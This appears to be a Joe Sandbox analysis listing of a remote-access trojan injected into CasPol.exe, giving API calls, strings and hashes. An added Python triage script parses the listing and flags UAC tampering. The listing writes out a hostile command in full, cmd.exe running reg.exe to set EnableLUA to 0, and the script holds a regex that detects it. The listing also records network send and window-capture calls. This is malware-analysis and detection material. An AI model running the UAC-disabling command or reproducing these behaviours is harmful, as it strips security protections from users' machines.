                                                                              • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                              APIs
                                                                              • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                              • GetLastError.KERNEL32 ref: 0041CA91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ClassCreateErrorLastRegisterWindow
                                                                              • String ID: 0$MsgWindowClass
                                                                              • API String ID: 2877667751-2410386613
                                                                              • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                              • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                              • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                              • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                              APIs
                                                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                              • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                              • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                              Strings
                                                                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                              • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$CreateProcess
                                                                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                              • API String ID: 2922976086-4183131282
                                                                              • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                              • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                              • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                              • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
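The CreateProcessA entry above is the report's clearest single indicator: `cmd.exe /k %windir%\System32\reg.exe ADD HKLM\...\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f`, launched with dwCreationFlags 08000000 (CREATE_NO_WINDOW) so no console appears. Two caveats a responder should keep in mind: writing that HKLM value only succeeds from an already-elevated process, and EnableLUA=0 does not take effect until the next reboot, so a host can still show UAC prompts after the write. The Python below is an added example, not part of the Joe Sandbox report or the malware: it parses API entries in the listing format used on this page, pulls the image, command line and creation flags out of CreateProcessA/W calls, and flags the EnableLUA tamper. Joe prints arguments comma-separated, so the argument split is best-effort for string arguments that themselves contain commas; the notepad line in the sample is constructed.

```python
import re
from typing import Dict, List, Optional

# Shape of one "APIs" entry in a Joe Sandbox function listing (this page's own format):
#   CreateProcessA.KERNEL32(<arg>,<arg>,...), ref: 00406A00
# Arguments are comma-separated in the listing, so a string argument containing a
# comma would be split too eagerly; treat the parsed argument list as best-effort.
API_LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# dwCreationFlags bits (Win32 constants) worth surfacing during triage.
CREATION_FLAGS = {
    0x00000004: "CREATE_SUSPENDED",
    0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE",
    0x00000200: "CREATE_NEW_PROCESS_GROUP",
    0x08000000: "CREATE_NO_WINDOW",
}

# reg.exe ADD ... Policies\System /v EnableLUA ... /d 0 : disables UAC at next boot.
ENABLE_LUA_RE = re.compile(
    r"reg(?:\.exe)?\s+add\s+\"?(?:HKLM|HKEY_LOCAL_MACHINE)\\SOFTWARE\\Microsoft\\Windows"
    r"\\CurrentVersion\\Policies\\System\"?\s.*?/v\s+EnableLUA\b.*?/d\s+0\b",
    re.IGNORECASE,
)


def parse_api_line(line: str) -> Optional[Dict]:
    """Split one listing entry into function, module, argument list and call site."""
    m = API_LINE_RE.match(line)
    if not m:
        return None
    return {
        "func": m.group("func"),
        "module": m.group("module"),
        "args": [a.strip() for a in m.group("args").split(",")],
        "ref": m.group("ref").upper(),
    }


def decode_creation_flags(value: int) -> List[str]:
    names = [name for bit, name in CREATION_FLAGS.items() if value & bit]
    known = sum(CREATION_FLAGS)
    if value & ~known:
        names.append(f"UNKNOWN(0x{value & ~known:08X})")
    return names


def triage_create_process(entry: Dict) -> Optional[Dict]:
    """For a CreateProcessA/W entry: image, command line, decoded flags, UAC tamper."""
    if entry["func"] not in ("CreateProcessA", "CreateProcessW") or len(entry["args"]) < 6:
        return None
    image, cmdline, flags_hex = entry["args"][0], entry["args"][1], entry["args"][5]
    try:
        flags = int(flags_hex, 16)
    except ValueError:  # Joe prints "?" for values it could not resolve
        flags = 0
    return {
        "ref": entry["ref"],
        "image": image,
        "cmdline": cmdline,
        "flags": decode_creation_flags(flags),
        "uac_tamper": bool(ENABLE_LUA_RE.search(cmdline)),
    }


def find_uac_tamper(lines) -> List[str]:
    """Call sites (ref values) of every CreateProcess whose command line zeroes EnableLUA."""
    hits = []
    for line in lines:
        entry = parse_api_line(line)
        if not entry:
            continue
        t = triage_create_process(entry)
        if t and t["uac_tamper"]:
            hits.append(t["ref"])
    return hits


# Sample input: the CreateProcessA and CloseHandle entries from the listing above,
# plus one constructed benign CreateProcessW entry for contrast.
SAMPLE_LINES = [
    r"• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00",
    r"• CloseHandle.KERNEL32(?), ref: 00406A0F",
    r"• CreateProcessW.KERNEL32(C:\Windows\System32\notepad.exe,notepad.exe,00000000,00000000,00000000,00000010,00000000,00000000,?,?), ref: 00401000",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        entry = parse_api_line(line)
        if entry:
            print(entry["func"], triage_create_process(entry))
    print("UAC tamper at:", find_uac_tamper(SAMPLE_LINES))
```

`ENABLE_LUA_RE` is deliberately loose on spacing, case and the HKLM spelling, since the same tamper shows up in EDR process-creation telemetry where the command line was typed by hand; on a live host, confirm with `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA` and remember that a value of 0 there indicates the write succeeded, not that UAC is already off.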
                                                                              APIs
                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002), ref: 004425F9
                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000), ref: 0044262F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                              • API String ID: 4061214504-1276376045
                                                                              • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                              • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                              • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                              • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                              APIs
                                                                              • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                              • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                              • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateValue
                                                                              • String ID: pth_unenc$BG
                                                                              • API String ID: 1818849710-2233081382
                                                                              • Opcode ID: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
                                                                              • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                              • Opcode Fuzzy Hash: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
                                                                              • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                              APIs
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AED
                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404AF9
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B04
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B0D
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                              • String ID: KeepAlive | Disabled
                                                                              • API String ID: 2993684571-305739064
                                                                              • Opcode ID: c920db2117b9ebb21b6f907faadff67bbda6cb2284db632f5ba91f60e6129f46
                                                                              • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                              • Opcode Fuzzy Hash: c920db2117b9ebb21b6f907faadff67bbda6cb2284db632f5ba91f60e6129f46
                                                                              • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                              APIs
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                              • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                              • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                              • String ID: Alarm triggered
                                                                              • API String ID: 614609389-2816303416
                                                                              • Opcode ID: 54f3c6ceeae148a17d597440f56be2566e943f2b94ca636d37dea44f7b336d96
                                                                              • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                              • Opcode Fuzzy Hash: 54f3c6ceeae148a17d597440f56be2566e943f2b94ca636d37dea44f7b336d96
                                                                              • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                                              Strings
                                                                              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                              • API String ID: 3024135584-2418719853
                                                                              • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                              • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                              • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                              • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                                                                              • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                              • Opcode Fuzzy Hash: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                                                                              • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                              APIs
                                                                                • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                              • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                              • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                              • String ID:
                                                                              • API String ID: 3525466593-0
                                                                              • Opcode ID: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                                                                              • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                              • Opcode Fuzzy Hash: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                                                                              • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                              APIs
                                                                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
• Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
• CloseHandle.KERNEL32(00000000), ref: 0040E8AB
  • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
• API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
• String ID:
• API String ID: 4269425633-0
• Opcode ID: 0d775c34279de42def04f5e4a5f6fbb11c5f8ae86916d795950b7c30c7907390
• Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
• Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A

APIs
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
• Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
• Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84

APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
• __alloca_probe_16.LIBCMT ref: 0044FF58
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
• GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
• __freea.LIBCMT ref: 0044FFC4
  • Part of subcall function 00446AFF: HeapAlloc.KERNEL32(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
• API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
• String ID:
• API String ID: 1857427562-0
• Opcode ID: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
• Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
• Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4

APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0044E144
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
  • Part of subcall function 00446AFF: HeapAlloc.KERNEL32(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
• _free.LIBCMT ref: 0044E1A0
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
• API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
• String ID:
• API String ID: 2278895681-0
• Opcode ID: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
• Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
• Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9

APIs
• GetLastError.KERNEL32(00434403,00434403,?,00445359,00446B42,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?), ref: 00446F48
• _free.LIBCMT ref: 00446F7D
• _free.LIBCMT ref: 00446FA4
• SetLastError.KERNEL32(00000000,?,00434403), ref: 00446FB1
• SetLastError.KERNEL32(00000000,?,00434403), ref: 00446FBA
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
• Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
• Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F

APIs
• _free.LIBCMT ref: 0044F7B5
  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
• _free.LIBCMT ref: 0044F7C7
• _free.LIBCMT ref: 0044F7D9
• _free.LIBCMT ref: 0044F7EB
• _free.LIBCMT ref: 0044F7FD
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
• Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
• Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C

APIs
• _free.LIBCMT ref: 00443305
  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
• _free.LIBCMT ref: 00443317
• _free.LIBCMT ref: 0044332A
• _free.LIBCMT ref: 0044333B
• _free.LIBCMT ref: 0044334C
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
• Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
• Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E

APIs
• GetWindowThreadProcessId.USER32(?,?), ref: 00416768
• GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
• IsWindowVisible.USER32(?), ref: 004167A1
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
• API ID: ProcessWindow$Open$TextThreadVisible
• String ID: (FG
• API String ID: 3142014140-2273637114
• Opcode ID: 6c16c17156e3f772358f7467e06c9b2cfcef92d79dd8da7b0064c4f82c90d24e
• Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
• Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A

APIs
• GetKeyboardLayoutNameA.USER32(?), ref: 00409601
  • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
  • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
  • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
• API ID: CreateFileKeyboardLayoutNameconnectsendsocket
• String ID: XCG$`AG$>G
• API String ID: 2334542088-2372832151
• Opcode ID: ce0f8d336d2a156708e4fb79cc9eb4dc9fb8683efa97e21ee82fd6c7139a85ed
• Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
• Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A

APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00442714
• _free.LIBCMT ref: 004427DF
• _free.LIBCMT ref: 004427E9
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
• API ID: _free$FileModuleName
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
• API String ID: 2506810119-3657627342
• Opcode ID: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
• Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
• Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59

APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
